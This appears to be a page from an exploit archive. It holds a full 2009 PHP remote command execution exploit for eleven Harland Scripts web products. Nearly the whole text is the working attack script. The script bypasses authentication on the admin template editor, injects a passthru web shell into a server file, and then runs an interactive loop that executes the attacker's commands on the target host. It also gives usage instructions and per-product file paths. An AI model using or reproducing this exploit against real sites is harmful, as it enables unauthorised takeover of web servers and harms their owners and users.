[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Harland Scripts 11 Products Remote Command Execution Exploit
# Published : 2009-05-15
# Author : G4N0K
# Previous Title : Joomla Component ArtForms 2.1 b7 Remote File Inclusion Vulnerabilities
# Next Title : Rama CMS <= 0.9.8 (download.php file) File Disclosure Vulnerability
<?php
//786
/*
==============================================================================
_ _ _ _ _ _
/ | | | | / | | | |
/ _ | | | | / _ | |_| |
/ ___ | |___ | |___ / ___ | _ |
IN THE NAME OF /_/ _ |_____| |_____| /_/ _ |_| |_|
==============================================================================
____ _ _ _ _ ___ _ __
/ ___| | || | | | | / _ | |/ /
| | _ | || |_ | | | | | | | | ' /
| |_| | |__ _| | | | | |_| | | .
____| |_| |_| _| ___/ |_|_...FROM IRAN
==============================================================================
Harland Scripts 11 Products Remote Command Execution Exploit
==============================================================================
[?a] Script:.............[ Harland Scripts 11 Products ]...............
[?a] Website:............[ http://harlandscripts.com(!) ]..............
[?a] Today:..............[ 1005009 ]..................................
[?a] Founder:............[ G4N0K | mail[.]ganok[sh!t]gmail.com ].......
[+] What's going on
======================================
[0] Auth bypass...
[1] PHP-Code Injection...
[+] Vulnerable Scripts
======================================
1 - Traffic Click 4 Cash Script
2 - Get A Date Script
3 - Birthsake Keepsake
4 - FFA
5 - TShirt Rental Script
6 - Mug Rental script
7 - Top Hits
8 - Recipe 6.0
9 - Link Lister Traffic System
10 - Link Back Checker Service Script
11 - AD PHP Script
[+] SQLi & AFU
======================================
Some of these scripts are also vulnerable to "SQLi" and "Arbitrary File Upload(Auth bypass)"...
*/
error_reporting(0);
if (php_sapi_name() <> "cli") {
die("WTF, Run Me From CommandLine...");
}
if ($argc <> 4){__nfo();__usg();exit;}
$hst = $argv[1];
$pth = $argv[2];
$prd = $argv[3];
function __nfo()
{
$ganok = <<<EOL
+-------------------------------------------------------------+
| Harland Scripts Multiple Products Command Execution Exploit |
| by: G4N0K | mail[o]ganok[ta]com |
| Thanks: ALLAH, MSD, SMN, AMD, AFN, Str0ke |
+-------------------------------------------------------------+
rn
EOL;
print $ganok;
}
function __usg()
{
echo <<<GNK
uasge...:
xpl.php [host] [path] [product-number]
xpl.php 127.0.0.1 /FFA/ 4
Product Numbers:
=========================================
1 - Traffic Click 4 Cash Script
2 - Get A Date Script
3 - Birthsake Keepsake
4 - FFA
5 - TShirt Rental Script
6 - Mug Rental script
7 - Top Hits
8 - Recipe 6.0
9 - Link Lister Traffic System
10 - Link Back Checker Service Script
11 - AD PHP Script
GNK;
}
function __snd($hst, $pkt)
{
$socket = fsockopen($hst, 80, $errno, $errstr, 30);
$ggg='';
if (!$socket) {
echo "rn [+] Socket err#: $errstr ($errno)nr";exit;
} else {
fwrite($socket, $pkt);
while (!feof($socket)) {
$g4n0k.=fgets($socket, 2048);
}
fclose($socket);
return $g4n0k;
}
}
function __srch($wt)
{
$pos = strpos($wt, 'gnkgnkgnk');
$pos_end = strrpos($wt, 'gnkgnkgnk');
if (!$pos && !$pos_end){echo " [!] error...rn";}
$rest = substr($wt, $pos+9, ($pos_end - ($pos+9)));
return $rest;
}
$joke = "act=save&fname=..%2Ftpl%2Fheader.php&art=%3C%3Fphp+error_reporting%280%29%3Bprint%28%22gnkgnkgnk%22%29%3Bpassthru%28%24_GET%5B%22gnk%22%5D%29%3Bprint%28%22gnkgnkgnk%22%29%3B+%3F%3E";
__nfo();
if ($prd == 1 || $prd == 2 || $prd == 3 || $prd == 4)
{
$pth0 = "admin/template.php";
$pth1 = "tpl/header.php";
}
elseif ($prd == 5 || $prd == 6)
{
$pth0 = "admin/template.php";
$pth1 = "templates/header.php";
}
elseif ($prd == 7)
{
$pth0 = "admin/template.php";
$pth1 = "template/header.php";
} elseif ($prd == 8)
{
$pth0 = "admin2/template.php";
$pth1 = "admin2/gnk.php";
$joke = "act=save&fname=gnk.php&art=%3C%3Fphp+error_reporting%280%29%3Bprint%28%22gnkgnkgnk%22%29%3Bpassthru%28%24_GET%5B%22gnk%22%5D%29%3Bprint%28%22gnkgnkgnk%22%29%3B+%3F%3E";
} elseif ($prd == 9)
{
$pth0 = "admin/template.php";
$pth1 = "admin/backup/gnk.php";
$joke = "act=save&fname=backup%2Fgnk.php&art=%3C%3Fphp+error_reporting%280%29%3Bprint%28%22gnkgnkgnk%22%29%3Bpassthru%28%24_GET%5B%22gnk%22%5D%29%3Bprint%28%22gnkgnkgnk%22%29%3B+%3F%3E";
} elseif ($prd == 10)
{
$pth0 = "admincontrol/template.php";
$pth1 = "admincontrol/gnk.php";
$joke = "act=save&fname=gnk.php&art=%3C%3Fphp+error_reporting%280%29%3Bprint%28%22gnkgnkgnk%22%29%3Bpassthru%28%24_GET%5B%22gnk%22%5D%29%3Bprint%28%22gnkgnkgnk%22%29%3B+%3F%3E";
} elseif ($prd == 11)
{
$pth0 = "template.php";
$pth1 = "gnk.php";
$joke = "act=save&fname=gnk.php&art=%3C%3Fphp+error_reporting%280%29%3Bprint%28%22gnkgnkgnk%22%29%3Bpassthru%28%24_GET%5B%22gnk%22%5D%29%3Bprint%28%22gnkgnkgnk%22%29%3B+%3F%3E";
} else
{
__usg();
exit;
}
$msd_pyld = "POST {$pth}{$pth0} HTTP/1.1rn";
$msd_pyld .= "Host: {$hst}rn";
$msd_pyld .= "Keep-Alive: 300nr";
$msd_pyld .= "Connection: keep-alivern";
$msd_pyld .= "Content-Length: ".strlen($joke)."rn";
$msd_pyld .= "Content-Type: application/x-www-form-urlencodedrnrn";
$msd_pyld .= $joke;
echo "rn [+] Trying to exploit {$hst}...";
$amd_pyld = "GET {$pth}{$pth1} HTTP/1.1rn";
$amd_pyld .= "Host: {$hst}rn";
$amd_pyld .= "Connection: closenrnr";
if (!stristr(__snd($hst, $msd_pyld), "permission") && stristr(__snd($hst, $amd_pyld), "gnk"))
{
echo "rn [+] PHP-Code has been injected...";
echo "rn [+] Now you can exec your commands...rn";} else {
echo "rn [+] Oops!, Code injection failed.rn"; exit;
}
while(1)
{
echo "rnphp-shell@{$hst}# ";
if (($cmd = str_replace (" ", "%20", trim(fgets(STDIN)))) == "exit") exit;
$smn_pyld = "GET {$pth}{$pth1}?gnk=".$cmd." HTTP/1.1rn";
$smn_pyld .= "Host: {$hst}rn";
$smn_pyld .= "Connection: closenrnr";
print __srch(__snd($hst, $smn_pyld));
}
?>
# www.Syue.com [2009-05-15]